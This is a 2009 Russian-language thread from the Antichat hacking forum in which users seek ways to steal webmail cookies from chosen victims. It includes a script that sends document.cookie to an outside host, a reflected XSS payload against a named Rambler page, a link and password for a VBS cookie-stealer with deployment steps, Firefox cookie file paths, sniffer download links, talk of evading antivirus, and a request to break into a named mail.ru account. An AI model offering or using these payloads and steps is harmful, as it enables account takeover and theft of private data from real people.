Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   Кража куки через клик по ссылке (https://forum.antichat.xyz/showthread.php?t=119097)

LemoTTT 04.05.2009 21:25

Кража куки через клик по ссылке
 
если я на бесплатном хосте сделаю хтмл страницу с скриптом, который тырит куки
Код HTML:

<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
и жертва откроет по ссылке ету страницу, то у меня будут куки или нет?
ЗЫ: пишем те, кто уже точно знает!

fl00der 04.05.2009 21:27

В общем случае куки можно получить только в рамках одного домена.

LemoTTT 04.05.2009 21:38

смотри, я послал жертве на мейл.ру она открыла ссылку етой странице, у меня буду ее куки от почтового ящика?!

pento 04.05.2009 21:44

не будут

LemoTTT 04.05.2009 21:46

так как же можно получить куки, если жертва киликает по ссылки, как? какой скрипт, уже много статей почитал инфы 0!искать xss ето не к етой теме!

Tigger 04.05.2009 21:59

Ты, видимо, не понимаешь, что куки без xss не своруешь.

LemoTTT 04.05.2009 22:02

та бред ети xss, если меня интересует определенное мыло, и xss на нем нету, как кто то же можно угнать куки!!!!!!!
ЗЫ брут бредддддддд!

Ershik 04.05.2009 22:28

Бред говоришь ты.
У тебя есть колеса - этот скрипт. Но нет двигателя XSS
Как ты без двигателя толкнешь колеса?
Да никак.
Xss и используется, чтобы сookie своровать.

LemoTTT 04.05.2009 22:40

ну вот например в3ять мейл ру, именно почту, а не другие ресурсы, наврядли там есть xss
Зы: 1. пасивная xss что нам дает, с ней моно гнать куки
2. и вообще пасивніе же xss должні прибивать, коль о них много народу знает!

LemoTTT 04.05.2009 22:41

ну вот например в3ять мейл ру, именно почту, а не другие ресурсы, наврядли там есть xss
Зы: 1. пасивная xss что нам дает, с ней моно гнать куки
2. и вообще пасивніе же xss должны прибивать, коль о них много народу знает!

Ershik 04.05.2009 22:46

Не исключено, что нет.
Может, не говорят о ней, или еще не нашли?
Если пытаешься атаковать там, где нет Xss все действия просто бессмыслены)

LemoTTT 04.05.2009 22:56

а как можно легко добыть куки почт ящика, не посылайте читать темы, просто опишите как делаете это вы!

Ice_Burn 05.05.2009 00:36

http://mirhtml.narod.ru/kuki_2.rar

Pass:123

Редактируешь файл , заливаешь на хост и даёшь линк жертве...
И те на хост приходит файл с куками ...

Тестировалось на Windows sp2

Digital111 05.05.2009 11:15

Ice_Burn, скажи еще как именно залить? Narod.ru подойдет? Какую ссылку нужно давать? И куда прийдут куки?

wildshaman 05.05.2009 11:17

Цитата:

Сообщение от LemoTTT
ну вот например в3ять мейл ру, именно почту, а не другие ресурсы, наврядли там есть xss
Зы: 1. пасивная xss что нам дает, с ней моно гнать куки
2. и вообще пасивніе же xss должны прибивать, коль о них много народу знает!


закончи школу, утройся на работу и забудешь про xss...

Denssss 05.05.2009 11:35

Цитата:

Сообщение от Ice_Burn
http://mirhtml.narod.ru/kuki_2.rar

Pass:123

Редактируешь файл , заливаешь на хост и даёшь линк жертве...
И те на хост приходит файл с куками ...

Тестировалось на Windows sp2

Буду проверять :) гыыы ну естесно у лоха никаих антивиров не должно быть ?

Player#1 05.05.2009 14:43

ТС задолбал создавать тупые темы !!! где модераторы???

http://forum.antichat.ru/thread118782.html
http://forum.antichat.ru/thread118777.html

нельзя же быть настолько тупым.. читай форум и не задавай тупых вопросов.

LemoTTT 05.05.2009 16:13

слушай, я задаю эти вопросы и людя интересно, которые тоже заинтересованы в помоще, а ты такой же новичек как и я, и кричиш тут на весь форум "Где модераторы..." воображая из себя какого то перца!
ЗЫ: кто то тестил способ от Ice_Burn

Player#1 05.05.2009 19:11

Не хочу оффтопить, но воображаешь из себя только ты и причем не "какого то перца", а какого-то неадыкватного человека.. зачем создавать 3 одинаковых темы и обсуждать в них вопрос который понятен ЛЮБОМУ кто хоть чуть-чуть шарит в IT... а ты если не шаришь, то попытайся хотя бы полистать форум, начни с этой темы: http://forum.antichat.ru/thread20140.html
з.ы. мой статус новичка ни о чем не говорит...

LemoTTT 05.05.2009 19:34

я читал, ну ты пойми, ну это же почти нериал искать ети xss, вот возьмем mail.ru, при регистрации пару полей и я проверял нет там xss? где еще можно искать? на "Мой мир" такая же история, естих полей мало для заолнения и коментов ГДЕ там чтот о можно найти, БРЕД!

fl00der 05.05.2009 19:44

Цитата:

Сообщение от Ice_Burn
http://mirhtml.narod.ru/kuki_2.rar

Pass:123

Редактируешь файл , заливаешь на хост и даёшь линк жертве...
И те на хост приходит файл с куками ...

Тестировалось на Windows sp2

Спс надо затестить

_casper_ 05.05.2009 20:55

может я и нуб.... но по-моему скрипт просто открывается как текстовый файл.

_casper_ 05.05.2009 21:10

сори, я все вразумил.

LemoTTT 06.05.2009 10:40

так работает такая схема или нет, отпишитеся!

Ice_Burn 12.05.2009 06:33

Цитата:

Ice_Burn, скажи еще как именно залить? Narod.ru подойдет? Какую ссылку нужно давать? И куда прийдут куки?
Залить лучше на Народ
Открываете файл через текстовой редактор и вписываете данные зареганного хоста
Линк давать прямой....http://name.narod.ru/123.vbs

Demon32 12.05.2009 23:54

Цитата:

Сообщение от Ice_Burn
http://mirhtml.narod.ru/kuki_2.rar

Pass:123

Редактируешь файл , заливаешь на хост и даёшь линк жертве...
И те на хост приходит файл с куками ...

Тестировалось на Windows sp2


А возможно с Мозиллы украсть куки??? не могу понять как прописать путь к куки, путь вот он C:\Documents and Settings\" & WshShell1.ExpandEnvironmentStrings("%USERNAME%") & "\Application Data\Mozilla\Firefox\Profiles\r5a2432u.default\coo kies.sqlite но я так понимаю что r5a2432u.default будет на каждом компе разный. Я прав или нет?

25:17 13.05.2009 00:00

Цитата:

Сообщение от Ershik
Если пытаешься атаковать там, где нет Xss все действия просто бессмыслены)

хм... вообще-то ты бред пишешь, при определенных условиях можно угнать куки даже если нет XSS

GekTer 17.05.2009 12:14

помогите пожалуста взломать мыло pink23@mail.ru. Уже всё перепробывал и ничего не получается!!!

mazaxaka 17.05.2009 14:58

Прочитал тему , чтото толком не понял , допутсим есть сайт у меня я хочю чтоб у каждого зашедшего тырились куки , напимер от почты и контакт или однокласники , мне для етого нужно как каждом сервисе искать хсс ? или как зедалть чтоб сливались все кучи что есть в папке кукисов у юзера?

GrandMaster 17.05.2009 15:13

Цитата:

А возможно с Мозиллы украсть куки??? не могу понять как прописать путь к куки, путь вот он C:\Documents and Settings\" & WshShell1.ExpandEnvironmentStrings("%USERNAME%") & "\Application Data\Mozilla\Firefox\Profiles\r5a2432u.default\coo kies.sqlite но я так понимаю что r5a2432u.default будет на каждом компе разный. Я прав или нет?
Прав
Цитата:

так работает такая схема или нет, отпишитеся!
сейчас проверю

Цитата:

Прочитал тему , чтото толком не понял , допутсим есть сайт у меня я хочю чтоб у каждого зашедшего тырились куки , напимер от почты и контакт или однокласники , мне для етого нужно как каждом сервисе искать хсс ? или как зедалть чтоб сливались все кучи что есть в папке кукисов у юзера?
ну если сможешь на хост залить вирус который сам качается и запускается, то да. А так куки от контакта хранятся в \Documents and Settings\пользователь\Cookies

GrandMaster 17.05.2009 15:14

Цитата:

сейчас проверю
не проверю, ссылка не работает. Кто нить перезалейте. я про это


Цитата:

Сообщение от Ice_Burn
http://mirhtml.narod.ru/kuki_2.rar

Pass:123

Редактируешь файл , заливаешь на хост и даёшь линк жертве...
И те на хост приходит файл с куками ...

Тестировалось на Windows sp2

Demon32 22.05.2009 13:20

Inviz2009.narod.ru/kuki_2.rar
без пароля

LemoTTT 22.05.2009 14:53

Кто то пробовал уже, тяжело отписать?!

WoxLtd 23.05.2009 20:31

пробовал работает!еще бы туда определение ОС и чтоб с висты тоже тырить.вот только вопрос,к чему етот скрипт прилепить чтоб антивирь не палил??? joiner2.5 и то что он слепил нод сразу удалил

Велемир 24.05.2009 02:36

Цитата:

Сообщение от LemoTTT
слушай, я задаю эти вопросы и людя интересно, которые тоже заинтересованы в помоще, а ты такой же новичек как и я, и кричиш тут на весь форум "Где модераторы..." воображая из себя какого то перца!
ЗЫ: кто то тестил способ от Ice_Burn

Никому это не интересно,потому что такой кривобред даже я не напишу(

Bendjamin 24.05.2009 19:54

Цитата:

Сообщение от WoxLtd
пробовал работает!еще бы туда определение ОС и чтоб с висты тоже тырить.вот только вопрос,к чему етот скрипт прилепить чтоб антивирь не палил??? joiner2.5 и то что он слепил нод сразу удалил

Вокс,дай свою асю в ЛС,спрошу кое-что...

OTMAROZAK 10.06.2009 14:49

ама

OTMAROZAK 10.06.2009 15:05

я всё во скрипт вписал!!!!!
но он чтот не пашет:((((

на народ он не заливается!!!:(
www.....xxx.ru/1.vbs он его открывает как обычный текстовый документ!!(((
что делать!?

Nitrogeniys 10.06.2009 21:26

Да ё моё скачай легче просто снифер нормальный!
Залей на бесплатку!
И всё !
Ссылка на один из мощнейший снифер!
http://depositfiles.com/files/wzuru9epk
Советую ставить на хостинг uuuq
Строгие требования: PHP + MySQL + htaccess

Если помог смело ставь +

DIMON4G 14.06.2009 03:33

Цитата:

Сообщение от LemoTTT
та бред ети xss, если меня интересует определенное мыло, и xss на нем нету, как кто то же можно угнать куки!!!!!!!
ЗЫ брут бредддддддд!

долбаёп, хсс нужны, без них никак ;)
вот пример на рамблере :)
Код:

http://health.rambler.ru/drugs/pharmacy.html?phid=37"><script>alert(document.cookie)</script>
alert(document.cookie) - это значит, чтобы мы увидили куки, ну и осталось тока сделать, чтобы они записывалисы в снифер, вот нормальный http://kanick.ru/sniffer/
p.s. удачи в хеке :D и почитай вот это http://forum.antichat.ru/thread20140.html


Время: 04:53